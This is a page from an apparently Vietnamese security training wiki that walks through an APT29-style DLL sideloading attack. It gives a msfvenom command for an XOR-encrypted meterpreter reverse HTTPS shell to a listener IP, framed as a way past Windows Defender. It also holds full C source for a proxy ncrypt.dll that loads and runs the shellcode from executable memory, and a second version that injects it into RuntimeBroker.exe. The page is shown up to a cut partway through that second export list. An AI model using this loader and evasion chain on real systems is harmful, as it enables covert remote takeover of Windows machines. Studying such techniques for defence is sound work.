VCS Passport Blue Team
  • VCS Passport 2024 : Blue Team
  • Server-Side Vulnerabilities
    • SQL Injection Writeup
    • Authentication Writeup
    • Access Control Writeup
    • Command Injection Writeup
    • Path Traversal Writeup
    • File Upload Vulnerabilities Writeup
    • Information Disclosure Writeup
  • Client-Side Vulnerabilities
    • Cross-site Scripting Writeup
  • Advanced Web Vulnerabilities
    • Insecure Deserialization Writeup
  • Code Punching
    • Bá
    • Đạt
    • Hải
    • Khiêm
    • Quân
    • Nam
  • Programing
    • Keylogger
    • Reverse Shell
    • Process Injection
    • Basic Process, Thread, HANDLE
    • Hook
  • LINUX PROGRAMING
    • Linux Internal
    • Keylogger & Ransomware
    • Hook & Inject
  • MALWARE ANALYSIS
    • Unpack
    • Finding Threat (Lab 21 - 24)
    • Malware Analysis
    • Finding Threat (Lab 01 - 20)
  • OJT
    • Cobalt Strike Lab
    • Shell
    • TTGS CTF
    • VCS Blue CTF Season 2
    • Process and Thread
    • Service
    • COM Hijack
    • OSCP
    • Active Directory
    • Log
    • Log Windows
    • Browser-C2
    • DllSideload
    • Purple Lab
  • Forensic Class HaiNH45
    • Week 1
    • Week 2
    • Week 3
Powered by GitBook
On this page
  • Recon:
  • Preparing Reverse Shell
  • Preparing Dll to Sideload
  • Exploit:
  1. OJT

DllSideload

On Job Training

PreviousBrowser-C2NextPurple Lab

Last updated 7 months ago

Dựa trên APT29 nhưng đơn giản hơn

Recon:

Sử dụng Process Monitor để tìm ra dll có thể lợi dụng. Ở đây mình sẽ filter các dll mà không tìm thấy ở thư mục root của phần mềm.

Ở đây mình sẽ tấn công vào ncrypt.dll, thứ mà ta sẽ kiếm được ở trong System32

Preparing Reverse Shell

Tạo shellcode bằng msfvenom. Sử dụng xor để bypass Windows Defender.

Pass ở đây chính là cái được sử dụng của APT29

msfvenom -p windows/x64/meterpreter/reverse_https lhost=192.168.23.131 lport=4444 f raw -o viber.bin exitfunc=thread --encrypt xor --encrypt-key "jikoewarfkmzsdlhfnuiwaejrpaw" exitfunc=thread -v shellcode

Preparing Dll to Sideload

Sử dụng tool SharpDllProxy để tạo ra dll phục vụ việc sideload

PS C:\Users\REDACTED\Desktop\SharpDllProxy\SharpDllProxy\bin\Release\netcoreapp3.1> .\SharpDllProxy.exe --dll .\ncrypt.dll --payload .\viber.bin
[+] Reading exports from C:\Users\REDACTED\Desktop\SharpDllProxy\SharpDllProxy\bin\Release\netcoreapp3.1\version.dll...
[+] Redirected 17 function calls from version.dll to tmp9CED.dll
[+] Exporting DLL C source to C:\Users\REDACTED\Desktop\SharpDllProxy\SharpDllProxy\bin\Release\netcoreapp3.1\output_version\version_pragma.c

Lấy code trong file ncrypt_pragma.c, replace tất cả chuỗi "tmp9CED" thành "ncrypts" và compile là ta sẽ có file ncrypt.dll:

#include "pch.h"
#include <stdio.h>
#include <stdlib.h>

#define _CRT_SECURE_NO_DEPRECATE
#pragma warning (disable : 4996)

#pragma comment(linker, "/export:BCryptAddContextFunction=ncrypts.BCryptAddContextFunction,@1")
#pragma comment(linker, "/export:BCryptAddContextFunctionProvider=ncrypts.BCryptAddContextFunctionProvider,@2")
#pragma comment(linker, "/export:BCryptCloseAlgorithmProvider=ncrypts.BCryptCloseAlgorithmProvider,@3")
#pragma comment(linker, "/export:BCryptConfigureContext=ncrypts.BCryptConfigureContext,@4")
#pragma comment(linker, "/export:BCryptConfigureContextFunction=ncrypts.BCryptConfigureContextFunction,@5")
#pragma comment(linker, "/export:BCryptCreateContext=ncrypts.BCryptCreateContext,@6")
#pragma comment(linker, "/export:BCryptCreateHash=ncrypts.BCryptCreateHash,@7")
#pragma comment(linker, "/export:BCryptDecrypt=ncrypts.BCryptDecrypt,@8")
#pragma comment(linker, "/export:BCryptDeleteContext=ncrypts.BCryptDeleteContext,@9")
#pragma comment(linker, "/export:BCryptDeriveKey=ncrypts.BCryptDeriveKey,@10")
#pragma comment(linker, "/export:BCryptDeriveKeyCapi=ncrypts.BCryptDeriveKeyCapi,@11")
#pragma comment(linker, "/export:BCryptDeriveKeyPBKDF2=ncrypts.BCryptDeriveKeyPBKDF2,@12")
#pragma comment(linker, "/export:BCryptDestroyHash=ncrypts.BCryptDestroyHash,@13")
#pragma comment(linker, "/export:BCryptDestroyKey=ncrypts.BCryptDestroyKey,@14")
#pragma comment(linker, "/export:BCryptDestroySecret=ncrypts.BCryptDestroySecret,@15")
#pragma comment(linker, "/export:BCryptDuplicateHash=ncrypts.BCryptDuplicateHash,@16")
#pragma comment(linker, "/export:BCryptDuplicateKey=ncrypts.BCryptDuplicateKey,@17")
#pragma comment(linker, "/export:BCryptEncrypt=ncrypts.BCryptEncrypt,@18")
#pragma comment(linker, "/export:BCryptEnumAlgorithms=ncrypts.BCryptEnumAlgorithms,@19")
#pragma comment(linker, "/export:BCryptEnumContextFunctionProviders=ncrypts.BCryptEnumContextFunctionProviders,@20")
#pragma comment(linker, "/export:BCryptEnumContextFunctions=ncrypts.BCryptEnumContextFunctions,@21")
#pragma comment(linker, "/export:BCryptEnumContexts=ncrypts.BCryptEnumContexts,@22")
#pragma comment(linker, "/export:BCryptEnumProviders=ncrypts.BCryptEnumProviders,@23")
#pragma comment(linker, "/export:BCryptEnumRegisteredProviders=ncrypts.BCryptEnumRegisteredProviders,@24")
#pragma comment(linker, "/export:BCryptExportKey=ncrypts.BCryptExportKey,@25")
#pragma comment(linker, "/export:BCryptFinalizeKeyPair=ncrypts.BCryptFinalizeKeyPair,@26")
#pragma comment(linker, "/export:BCryptFinishHash=ncrypts.BCryptFinishHash,@27")
#pragma comment(linker, "/export:BCryptFreeBuffer=ncrypts.BCryptFreeBuffer,@28")
#pragma comment(linker, "/export:BCryptGenRandom=ncrypts.BCryptGenRandom,@29")
#pragma comment(linker, "/export:BCryptGenerateKeyPair=ncrypts.BCryptGenerateKeyPair,@30")
#pragma comment(linker, "/export:BCryptGenerateSymmetricKey=ncrypts.BCryptGenerateSymmetricKey,@31")
#pragma comment(linker, "/export:BCryptGetFipsAlgorithmMode=ncrypts.BCryptGetFipsAlgorithmMode,@32")
#pragma comment(linker, "/export:BCryptGetProperty=ncrypts.BCryptGetProperty,@33")
#pragma comment(linker, "/export:BCryptHash=ncrypts.BCryptHash,@34")
#pragma comment(linker, "/export:BCryptHashData=ncrypts.BCryptHashData,@35")
#pragma comment(linker, "/export:BCryptImportKey=ncrypts.BCryptImportKey,@36")
#pragma comment(linker, "/export:BCryptImportKeyPair=ncrypts.BCryptImportKeyPair,@37")
#pragma comment(linker, "/export:BCryptKeyDerivation=ncrypts.BCryptKeyDerivation,@38")
#pragma comment(linker, "/export:BCryptOpenAlgorithmProvider=ncrypts.BCryptOpenAlgorithmProvider,@39")
#pragma comment(linker, "/export:BCryptQueryContextConfiguration=ncrypts.BCryptQueryContextConfiguration,@40")
#pragma comment(linker, "/export:BCryptQueryContextFunctionConfiguration=ncrypts.BCryptQueryContextFunctionConfiguration,@41")
#pragma comment(linker, "/export:BCryptQueryContextFunctionProperty=ncrypts.BCryptQueryContextFunctionProperty,@42")
#pragma comment(linker, "/export:BCryptQueryProviderRegistration=ncrypts.BCryptQueryProviderRegistration,@43")
#pragma comment(linker, "/export:BCryptRegisterConfigChangeNotify=ncrypts.BCryptRegisterConfigChangeNotify,@44")
#pragma comment(linker, "/export:BCryptRegisterProvider=ncrypts.BCryptRegisterProvider,@45")
#pragma comment(linker, "/export:BCryptRemoveContextFunction=ncrypts.BCryptRemoveContextFunction,@46")
#pragma comment(linker, "/export:BCryptRemoveContextFunctionProvider=ncrypts.BCryptRemoveContextFunctionProvider,@47")
#pragma comment(linker, "/export:BCryptResolveProviders=ncrypts.BCryptResolveProviders,@48")
#pragma comment(linker, "/export:BCryptSecretAgreement=ncrypts.BCryptSecretAgreement,@49")
#pragma comment(linker, "/export:BCryptSetAuditingInterface=ncrypts.BCryptSetAuditingInterface,@50")
#pragma comment(linker, "/export:BCryptSetContextFunctionProperty=ncrypts.BCryptSetContextFunctionProperty,@51")
#pragma comment(linker, "/export:BCryptSetProperty=ncrypts.BCryptSetProperty,@52")
#pragma comment(linker, "/export:BCryptSignHash=ncrypts.BCryptSignHash,@53")
#pragma comment(linker, "/export:BCryptUnregisterConfigChangeNotify=ncrypts.BCryptUnregisterConfigChangeNotify,@54")
#pragma comment(linker, "/export:BCryptUnregisterProvider=ncrypts.BCryptUnregisterProvider,@55")
#pragma comment(linker, "/export:BCryptVerifySignature=ncrypts.BCryptVerifySignature,@56")
#pragma comment(linker, "/export:GetIsolationServerInterface=ncrypts.GetIsolationServerInterface,@57")
#pragma comment(linker, "/export:GetKeyStorageInterface=ncrypts.GetKeyStorageInterface,@58")
#pragma comment(linker, "/export:GetSChannelInterface=ncrypts.GetSChannelInterface,@59")
#pragma comment(linker, "/export:NCryptCloseKeyProtector=ncrypts.NCryptCloseKeyProtector,@60")
#pragma comment(linker, "/export:NCryptCloseProtectionDescriptor=ncrypts.NCryptCloseProtectionDescriptor,@61")
#pragma comment(linker, "/export:NCryptCreateClaim=ncrypts.NCryptCreateClaim,@62")
#pragma comment(linker, "/export:NCryptCreatePersistedKey=ncrypts.NCryptCreatePersistedKey,@63")
#pragma comment(linker, "/export:NCryptCreateProtectionDescriptor=ncrypts.NCryptCreateProtectionDescriptor,@64")
#pragma comment(linker, "/export:NCryptDecrypt=ncrypts.NCryptDecrypt,@65")
#pragma comment(linker, "/export:NCryptDeleteKey=ncrypts.NCryptDeleteKey,@66")
#pragma comment(linker, "/export:NCryptDeriveKey=ncrypts.NCryptDeriveKey,@67")
#pragma comment(linker, "/export:NCryptDuplicateKeyProtectorHandle=ncrypts.NCryptDuplicateKeyProtectorHandle,@68")
#pragma comment(linker, "/export:NCryptEncrypt=ncrypts.NCryptEncrypt,@69")
#pragma comment(linker, "/export:NCryptEnumAlgorithms=ncrypts.NCryptEnumAlgorithms,@70")
#pragma comment(linker, "/export:NCryptEnumKeys=ncrypts.NCryptEnumKeys,@71")
#pragma comment(linker, "/export:NCryptEnumStorageProviders=ncrypts.NCryptEnumStorageProviders,@72")
#pragma comment(linker, "/export:NCryptExportKey=ncrypts.NCryptExportKey,@73")
#pragma comment(linker, "/export:NCryptFinalizeKey=ncrypts.NCryptFinalizeKey,@74")
#pragma comment(linker, "/export:NCryptFreeBuffer=ncrypts.NCryptFreeBuffer,@75")
#pragma comment(linker, "/export:NCryptFreeObject=ncrypts.NCryptFreeObject,@76")
#pragma comment(linker, "/export:NCryptGetProperty=ncrypts.NCryptGetProperty,@77")
#pragma comment(linker, "/export:NCryptGetProtectionDescriptorInfo=ncrypts.NCryptGetProtectionDescriptorInfo,@78")
#pragma comment(linker, "/export:NCryptImportKey=ncrypts.NCryptImportKey,@79")
#pragma comment(linker, "/export:NCryptIsAlgSupported=ncrypts.NCryptIsAlgSupported,@80")
#pragma comment(linker, "/export:NCryptIsKeyHandle=ncrypts.NCryptIsKeyHandle,@81")
#pragma comment(linker, "/export:NCryptKeyDerivation=ncrypts.NCryptKeyDerivation,@82")
#pragma comment(linker, "/export:NCryptNotifyChangeKey=ncrypts.NCryptNotifyChangeKey,@83")
#pragma comment(linker, "/export:NCryptOpenKey=ncrypts.NCryptOpenKey,@84")
#pragma comment(linker, "/export:NCryptOpenKeyProtector=ncrypts.NCryptOpenKeyProtector,@85")
#pragma comment(linker, "/export:NCryptOpenStorageProvider=ncrypts.NCryptOpenStorageProvider,@86")
#pragma comment(linker, "/export:NCryptProtectKey=ncrypts.NCryptProtectKey,@87")
#pragma comment(linker, "/export:NCryptProtectSecret=ncrypts.NCryptProtectSecret,@88")
#pragma comment(linker, "/export:NCryptQueryProtectionDescriptorName=ncrypts.NCryptQueryProtectionDescriptorName,@89")
#pragma comment(linker, "/export:NCryptRegisterProtectionDescriptorName=ncrypts.NCryptRegisterProtectionDescriptorName,@90")
#pragma comment(linker, "/export:NCryptSecretAgreement=ncrypts.NCryptSecretAgreement,@91")
#pragma comment(linker, "/export:NCryptSetAuditingInterface=ncrypts.NCryptSetAuditingInterface,@92")
#pragma comment(linker, "/export:NCryptSetProperty=ncrypts.NCryptSetProperty,@93")
#pragma comment(linker, "/export:NCryptSignHash=ncrypts.NCryptSignHash,@94")
#pragma comment(linker, "/export:NCryptStreamClose=ncrypts.NCryptStreamClose,@95")
#pragma comment(linker, "/export:NCryptStreamOpenToProtect=ncrypts.NCryptStreamOpenToProtect,@96")
#pragma comment(linker, "/export:NCryptStreamOpenToUnprotect=ncrypts.NCryptStreamOpenToUnprotect,@97")
#pragma comment(linker, "/export:NCryptStreamOpenToUnprotectEx=ncrypts.NCryptStreamOpenToUnprotectEx,@98")
#pragma comment(linker, "/export:NCryptStreamUpdate=ncrypts.NCryptStreamUpdate,@99")
#pragma comment(linker, "/export:NCryptTranslateHandle=ncrypts.NCryptTranslateHandle,@100")
#pragma comment(linker, "/export:NCryptUnprotectKey=ncrypts.NCryptUnprotectKey,@101")
#pragma comment(linker, "/export:NCryptUnprotectSecret=ncrypts.NCryptUnprotectSecret,@102")
#pragma comment(linker, "/export:NCryptVerifyClaim=ncrypts.NCryptVerifyClaim,@103")
#pragma comment(linker, "/export:NCryptVerifySignature=ncrypts.NCryptVerifySignature,@104")
#pragma comment(linker, "/export:SslChangeNotify=ncrypts.SslChangeNotify,@105")
#pragma comment(linker, "/export:SslComputeClientAuthHash=ncrypts.SslComputeClientAuthHash,@106")
#pragma comment(linker, "/export:SslComputeEapKeyBlock=ncrypts.SslComputeEapKeyBlock,@107")
#pragma comment(linker, "/export:SslComputeFinishedHash=ncrypts.SslComputeFinishedHash,@108")
#pragma comment(linker, "/export:SslComputeSessionHash=ncrypts.SslComputeSessionHash,@109")
#pragma comment(linker, "/export:SslCreateClientAuthHash=ncrypts.SslCreateClientAuthHash,@110")
#pragma comment(linker, "/export:SslCreateEphemeralKey=ncrypts.SslCreateEphemeralKey,@111")
#pragma comment(linker, "/export:SslCreateHandshakeHash=ncrypts.SslCreateHandshakeHash,@112")
#pragma comment(linker, "/export:SslDecrementProviderReferenceCount=ncrypts.SslDecrementProviderReferenceCount,@113")
#pragma comment(linker, "/export:SslDecryptPacket=ncrypts.SslDecryptPacket,@114")
#pragma comment(linker, "/export:SslDeriveSessionTicketKey=ncrypts.SslDeriveSessionTicketKey,@115")
#pragma comment(linker, "/export:SslDuplicateTranscriptHash=ncrypts.SslDuplicateTranscriptHash,@116")
#pragma comment(linker, "/export:SslEncryptPacket=ncrypts.SslEncryptPacket,@117")
#pragma comment(linker, "/export:SslEnumCipherSuites=ncrypts.SslEnumCipherSuites,@118")
#pragma comment(linker, "/export:SslEnumCipherSuitesEx=ncrypts.SslEnumCipherSuitesEx,@119")
#pragma comment(linker, "/export:SslEnumEccCurves=ncrypts.SslEnumEccCurves,@120")
#pragma comment(linker, "/export:SslEnumProtocolProviders=ncrypts.SslEnumProtocolProviders,@121")
#pragma comment(linker, "/export:SslExpandBinderKey=ncrypts.SslExpandBinderKey,@122")
#pragma comment(linker, "/export:SslExpandExporterMasterKey=ncrypts.SslExpandExporterMasterKey,@123")
#pragma comment(linker, "/export:SslExpandNextGenTrafficKey=ncrypts.SslExpandNextGenTrafficKey,@124")
#pragma comment(linker, "/export:SslExpandPreSharedKey=ncrypts.SslExpandPreSharedKey,@125")
#pragma comment(linker, "/export:SslExpandResumptionMasterKey=ncrypts.SslExpandResumptionMasterKey,@126")
#pragma comment(linker, "/export:SslExpandTrafficKeys=ncrypts.SslExpandTrafficKeys,@127")
#pragma comment(linker, "/export:SslExpandWriteKey=ncrypts.SslExpandWriteKey,@128")
#pragma comment(linker, "/export:SslExportKey=ncrypts.SslExportKey,@129")
#pragma comment(linker, "/export:SslExportKeyingMaterial=ncrypts.SslExportKeyingMaterial,@130")
#pragma comment(linker, "/export:SslExtractEarlyKey=ncrypts.SslExtractEarlyKey,@131")
#pragma comment(linker, "/export:SslExtractHandshakeKey=ncrypts.SslExtractHandshakeKey,@132")
#pragma comment(linker, "/export:SslExtractMasterKey=ncrypts.SslExtractMasterKey,@133")
#pragma comment(linker, "/export:SslFreeBuffer=ncrypts.SslFreeBuffer,@134")
#pragma comment(linker, "/export:SslFreeObject=ncrypts.SslFreeObject,@135")
#pragma comment(linker, "/export:SslGenerateMasterKey=ncrypts.SslGenerateMasterKey,@136")
#pragma comment(linker, "/export:SslGeneratePreMasterKey=ncrypts.SslGeneratePreMasterKey,@137")
#pragma comment(linker, "/export:SslGenerateSessionKeys=ncrypts.SslGenerateSessionKeys,@138")
#pragma comment(linker, "/export:SslGetCipherSuitePRFHashAlgorithm=ncrypts.SslGetCipherSuitePRFHashAlgorithm,@139")
#pragma comment(linker, "/export:SslGetKeyProperty=ncrypts.SslGetKeyProperty,@140")
#pragma comment(linker, "/export:SslGetProviderProperty=ncrypts.SslGetProviderProperty,@141")
#pragma comment(linker, "/export:SslGetSessionTicketProtectionHeaderSize=ncrypts.SslGetSessionTicketProtectionHeaderSize,@142")
#pragma comment(linker, "/export:SslHashHandshake=ncrypts.SslHashHandshake,@143")
#pragma comment(linker, "/export:SslImportKey=ncrypts.SslImportKey,@144")
#pragma comment(linker, "/export:SslImportMasterKey=ncrypts.SslImportMasterKey,@145")
#pragma comment(linker, "/export:SslIncrementProviderReferenceCount=ncrypts.SslIncrementProviderReferenceCount,@146")
#pragma comment(linker, "/export:SslLookupCipherLengths=ncrypts.SslLookupCipherLengths,@147")
#pragma comment(linker, "/export:SslLookupCipherSuiteInfo=ncrypts.SslLookupCipherSuiteInfo,@148")
#pragma comment(linker, "/export:SslOpenPrivateKey=ncrypts.SslOpenPrivateKey,@149")
#pragma comment(linker, "/export:SslOpenProvider=ncrypts.SslOpenProvider,@150")
#pragma comment(linker, "/export:SslProtectSessionTicket=ncrypts.SslProtectSessionTicket,@151")
#pragma comment(linker, "/export:SslSignHash=ncrypts.SslSignHash,@152")
#pragma comment(linker, "/export:SslUnprotectSessionTicket=ncrypts.SslUnprotectSessionTicket,@153")
#pragma comment(linker, "/export:SslVerifySignature=ncrypts.SslVerifySignature,@154")


DWORD WINAPI DoMagic(LPVOID lpParameter)
{
	//https://stackoverflow.com/questions/14002954/c-programming-how-to-read-the-whole-file-contents-into-a-buffer
	FILE* fp;
	size_t size;
	unsigned char* buffer;

	fp = fopen("viber.bin", "rb");
	fseek(fp, 0, SEEK_END);
        size = ftell(fp);
        fseek(fp, 0, SEEK_SET);
        buffer = (unsigned char*)malloc(size);
	
	//https://ired.team/offensive-security/code-injection-process-injection/loading-and-executing-shellcode-from-portable-executable-resources
        fread(buffer, size, 1, fp);

        void* exec = VirtualAlloc(0, size, MEM_COMMIT, PAGE_EXECUTE_READWRITE);

        memcpy(exec, buffer, size);

        ((void(*) ())exec)();

	return 0;
}

    BOOL APIENTRY DllMain(HMODULE hModule,
        DWORD ul_reason_for_call,
        LPVOID lpReserved
    )
    {
        HANDLE threadHandle;

        switch (ul_reason_for_call)
        {
            case DLL_PROCESS_ATTACH:
		// https://gist.github.com/securitytube/c956348435cc90b8e1f7
                // Create a thread and close the handle as we do not want to use it to wait for it 
                threadHandle = CreateThread(NULL, 0, DoMagic, NULL, 0, NULL);
                CloseHandle(threadHandle);

            case DLL_THREAD_ATTACH:
                break;
            case DLL_THREAD_DETACH:
                break;
            case DLL_PROCESS_DETACH:
                break;
        }
        return TRUE;
    }

Dll dùng cho payload thường nên nó sẽ hoạt động khi không bật AV. Tuy nhiên payload của chúng ta đã bị mã hóa để bypass Windef nên ta phải sửa code để có thể xor payload. Tham khảo: https://github.com/ChoiSG/OneDriveUpdaterSideloading/blob/main/version/dllmain.cpp

Code này thêm nữa là sẽ inject shellcode vào tiến trình RunTimeBroker.exe để chạy reverse shell, thay vì chạy trực tiếp trong tiến trình viber.

#include "pch.h"
#include <Windows.h>
#include <TlHelp32.h>
#include <stdlib.h>
#include "CreateSection.h"
#pragma comment(lib, "ntdll")

#define _CRT_SECURE_NO_DEPRECATE
#pragma warning (disable : 4996)

#pragma comment(linker, "/export:BCryptAddContextFunction=ncrypts.BCryptAddContextFunction,@1")
#pragma comment(linker, "/export:BCryptAddContextFunctionProvider=ncrypts.BCryptAddContextFunctionProvider,@2")
#pragma comment(linker, "/export:BCryptCloseAlgorithmProvider=ncrypts.BCryptCloseAlgorithmProvider,@3")
#pragma comment(linker, "/export:BCryptConfigureContext=ncrypts.BCryptConfigureContext,@4")
#pragma comment(linker, "/export:BCryptConfigureContextFunction=ncrypts.BCryptConfigureContextFunction,@5")
#pragma comment(linker, "/export:BCryptCreateContext=ncrypts.BCryptCreateContext,@6")
#pragma comment(linker, "/export:BCryptCreateHash=ncrypts.BCryptCreateHash,@7")
#pragma comment(linker, "/export:BCryptDecrypt=ncrypts.BCryptDecrypt,@8")
#pragma comment(linker, "/export:BCryptDeleteContext=ncrypts.BCryptDeleteContext,@9")
#pragma comment(linker, "/export:BCryptDeriveKey=ncrypts.BCryptDeriveKey,@10")
#pragma comment(linker, "/export:BCryptDeriveKeyCapi=ncrypts.BCryptDeriveKeyCapi,@11")
#pragma comment(linker, "/export:BCryptDeriveKeyPBKDF2=ncrypts.BCryptDeriveKeyPBKDF2,@12")
#pragma comment(linker, "/export:BCryptDestroyHash=ncrypts.BCryptDestroyHash,@13")
#pragma comment(linker, "/export:BCryptDestroyKey=ncrypts.BCryptDestroyKey,@14")
#pragma comment(linker, "/export:BCryptDestroySecret=ncrypts.BCryptDestroySecret,@15")
#pragma comment(linker, "/export:BCryptDuplicateHash=ncrypts.BCryptDuplicateHash,@16")
#pragma comment(linker, "/export:BCryptDuplicateKey=ncrypts.BCryptDuplicateKey,@17")
#pragma comment(linker, "/export:BCryptEncrypt=ncrypts.BCryptEncrypt,@18")
#pragma comment(linker, "/export:BCryptEnumAlgorithms=ncrypts.BCryptEnumAlgorithms,@19")
#pragma comment(linker, "/export:BCryptEnumContextFunctionProviders=ncrypts.BCryptEnumContextFunctionProviders,@20")
#pragma comment(linker, "/export:BCryptEnumContextFunctions=ncrypts.BCryptEnumContextFunctions,@21")
#pragma comment(linker, "/export:BCryptEnumContexts=ncrypts.BCryptEnumContexts,@22")
#pragma comment(linker, "/export:BCryptEnumProviders=ncrypts.BCryptEnumProviders,@23")
#pragma comment(linker, "/export:BCryptEnumRegisteredProviders=ncrypts.BCryptEnumRegisteredProviders,@24")
#pragma comment(linker, "/export:BCryptExportKey=ncrypts.BCryptExportKey,@25")
#pragma comment(linker, "/export:BCryptFinalizeKeyPair=ncrypts.BCryptFinalizeKeyPair,@26")
#pragma comment(linker, "/export:BCryptFinishHash=ncrypts.BCryptFinishHash,@27")
#pragma comment(linker, "/export:BCryptFreeBuffer=ncrypts.BCryptFreeBuffer,@28")
#pragma comment(linker, "/export:BCryptGenRandom=ncrypts.BCryptGenRandom,@29")
#pragma comment(linker, "/export:BCryptGenerateKeyPair=ncrypts.BCryptGenerateKeyPair,@30")
#pragma comment(linker, "/export:BCryptGenerateSymmetricKey=ncrypts.BCryptGenerateSymmetricKey,@31")
#pragma comment(linker, "/export:BCryptGetFipsAlgorithmMode=ncrypts.BCryptGetFipsAlgorithmMode,@32")
#pragma comment(linker, "/export:BCryptGetProperty=ncrypts.BCryptGetProperty,@33")
#pragma comment(linker, "/export:BCryptHash=ncrypts.BCryptHash,@34")
#pragma comment(linker, "/export:BCryptHashData=ncrypts.BCryptHashData,@35")
#pragma comment(linker, "/export:BCryptImportKey=ncrypts.BCryptImportKey,@36")
#pragma comment(linker, "/export:BCryptImportKeyPair=ncrypts.BCryptImportKeyPair,@37")
#pragma comment(linker, "/export:BCryptKeyDerivation=ncrypts.BCryptKeyDerivation,@38")
#pragma comment(linker, "/export:BCryptOpenAlgorithmProvider=ncrypts.BCryptOpenAlgorithmProvider,@39")
#pragma comment(linker, "/export:BCryptQueryContextConfiguration=ncrypts.BCryptQueryContextConfiguration,@40")
#pragma comment(linker, "/export:BCryptQueryContextFunctionConfiguration=ncrypts.BCryptQueryContextFunctionConfiguration,@41")
#pragma comment(linker, "/export:BCryptQueryContextFunctionProperty=ncrypts.BCryptQueryContextFunctionProperty,@42")
#pragma comment(linker, "/export:BCryptQueryProviderRegistration=ncrypts.BCryptQueryProviderRegistration,@43")
#pragma comment(linker, "/export:BCryptRegisterConfigChangeNotify=ncrypts.BCryptRegisterConfigChangeNotify,@44")
#pragma comment(linker, "/export:BCryptRegisterProvider=ncrypts.BCryptRegisterProvider,@45")
#pragma comment(linker, "/export:BCryptRemoveContextFunction=ncrypts.BCryptRemoveContextFunction,@46")
#pragma comment(linker, "/export:BCryptRemoveContextFunctionProvider=ncrypts.BCryptRemoveContextFunctionProvider,@47")
#pragma comment(linker, "/export:BCryptResolveProviders=ncrypts.BCryptResolveProviders,@48")
#pragma comment(linker, "/export:BCryptSecretAgreement=ncrypts.BCryptSecretAgreement,@49")
#pragma comment(linker, "/export:BCryptSetAuditingInterface=ncrypts.BCryptSetAuditingInterface,@50")
#pragma comment(linker, "/export:BCryptSetContextFunctionProperty=ncrypts.BCryptSetContextFunctionProperty,@51")
#pragma comment(linker, "/export:BCryptSetProperty=ncrypts.BCryptSetProperty,@52")
#pragma comment(linker, "/export:BCryptSignHash=ncrypts.BCryptSignHash,@53")
#pragma comment(linker, "/export:BCryptUnregisterConfigChangeNotify=ncrypts.BCryptUnregisterConfigChangeNotify,@54")
#pragma comment(linker, "/export:BCryptUnregisterProvider=ncrypts.BCryptUnregisterProvider,@55")
#pragma comment(linker, "/export:BCryptVerifySignature=ncrypts.BCryptVerifySignature,@56")
#pragma comment(linker, "/export:GetIsolationServerInterface=ncrypts.GetIsolationServerInterface,@57")
#pragma comment(linker, "/export:GetKeyStorageInterface=ncrypts.GetKeyStorageInterface,@58")
#pragma comment(linker, "/export:GetSChannelInterface=ncrypts.GetSChannelInterface,@59")
#pragma comment(linker, "/export:NCryptCloseKeyProtector=ncrypts.NCryptCloseKeyProtector,@60")
#pragma comment(linker, "/export:NCryptCloseProtectionDescriptor=ncrypts.NCryptCloseProtectionDescriptor,@61")
#pragma comment(linker, "/export:NCryptCreateClaim=ncrypts.NCryptCreateClaim,@62")
#pragma comment(linker, "/export:NCryptCreatePersistedKey=ncrypts.NCryptCreatePersistedKey,@63")
#pragma comment(linker, "/export:NCryptCreateProtectionDescriptor=ncrypts.NCryptCreateProtectionDescriptor,@64")
#pragma comment(linker, "/export:NCryptDecrypt=ncrypts.NCryptDecrypt,@65")
#pragma comment(linker, "/export:NCryptDeleteKey=ncrypts.NCryptDeleteKey,@66")
#pragma comment(linker, "/export:NCryptDeriveKey=ncrypts.NCryptDeriveKey,@67")
#pragma comment(linker, "/export:NCryptDuplicateKeyProtectorHandle=ncrypts.NCryptDuplicateKeyProtectorHandle,@68")
#pragma comment(linker, "/export:NCryptEncrypt=ncrypts.NCryptEncrypt,@69")
#pragma comment(linker, "/export:NCryptEnumAlgorithms=ncrypts.NCryptEnumAlgorithms,@70")
#pragma comment(linker, "/export:NCryptEnumKeys=ncrypts.NCryptEnumKeys,@71")
#pragma comment(linker, "/export:NCryptEnumStorageProviders=ncrypts.NCryptEnumStorageProviders,@72")
#pragma comment(linker, "/export:NCryptExportKey=ncrypts.NCryptExportKey,@73")
#pragma comment(linker, "/export:NCryptFinalizeKey=ncrypts.NCryptFinalizeKey,@74")
#pragma comment(linker, "/export:NCryptFreeBuffer=ncrypts.NCryptFreeBuffer,@75")
#pragma comment(linker, "/export:NCryptFreeObject=ncrypts.NCryptFreeObject,@76")
#pragma comment(linker, "/export:NCryptGetProperty=ncrypts.NCryptGetProperty,@77")
#pragma comment(linker, "/export:NCryptGetProtectionDescriptorInfo=ncrypts.NCryptGetProtectionDescriptorInfo,@78")
#pragma comment(linker, "/export:NCryptImportKey=ncrypts.NCryptImportKey,@79")
#pragma comment(linker, "/export:NCryptIsAlgSupported=ncrypts.NCryptIsAlgSupported,@80")
#pragma comment(linker, "/export:NCryptIsKeyHandle=ncrypts.NCryptIsKeyHandle,@81")
#pragma comment(linker, "/export:NCryptKeyDerivation=ncrypts.NCryptKeyDerivation,@82")
#pragma comment(linker, "/export:NCryptNotifyChangeKey=ncrypts.NCryptNotifyChangeKey,@83")
#pragma comment(linker, "/export:NCryptOpenKey=ncrypts.NCryptOpenKey,@84")
#pragma comment(linker, "/export:NCryptOpenKeyProtector=ncrypts.NCryptOpenKeyProtector,@85")
#pragma comment(linker, "/export:NCryptOpenStorageProvider=ncrypts.NCryptOpenStorageProvider,@86")
#pragma comment(linker, "/export:NCryptProtectKey=ncrypts.NCryptProtectKey,@87")
#pragma comment(linker, "/export:NCryptProtectSecret=ncrypts.NCryptProtectSecret,@88")
#pragma comment(linker, "/export:NCryptQueryProtectionDescriptorName=ncrypts.NCryptQueryProtectionDescriptorName,@89")
#pragma comment(linker, "/export:NCryptRegisterProtectionDescriptorName=ncrypts.NCryptRegisterProtectionDescriptorName,@90")
#pragma comment(linker, "/export:NCryptSecretAgreement=ncrypts.NCryptSecretAgreement,@91")
#pragma comment(linker, "/export:NCryptSetAuditingInterface=ncrypts.NCryptSetAuditingInterface,@92")
#pragma comment(linker, "/export:NCryptSetProperty=ncrypts.NCryptSetProperty,@93")
#pragma comment(linker, "/export:NCryptSignHash=ncrypts.NCryptSignHash,@94")
#pragma comment(linker, "/export:NCryptStreamClose=ncrypts.NCryptStreamClose,@95")
#pragma comment(linker, "/export:NCryptStreamOpenToProtect=ncrypts.NCryptStreamOpenToProtect,@96")
#pragma comment(linker, "/export:NCryptStreamOpenToUnprotect=ncrypts.NCryptStreamOpenToUnprotect,@97")
#pragma comment(linker, "/export:NCryptStreamOpenToUnprotectEx=ncrypts.NCryptStreamOpenToUnprotectEx,@98")
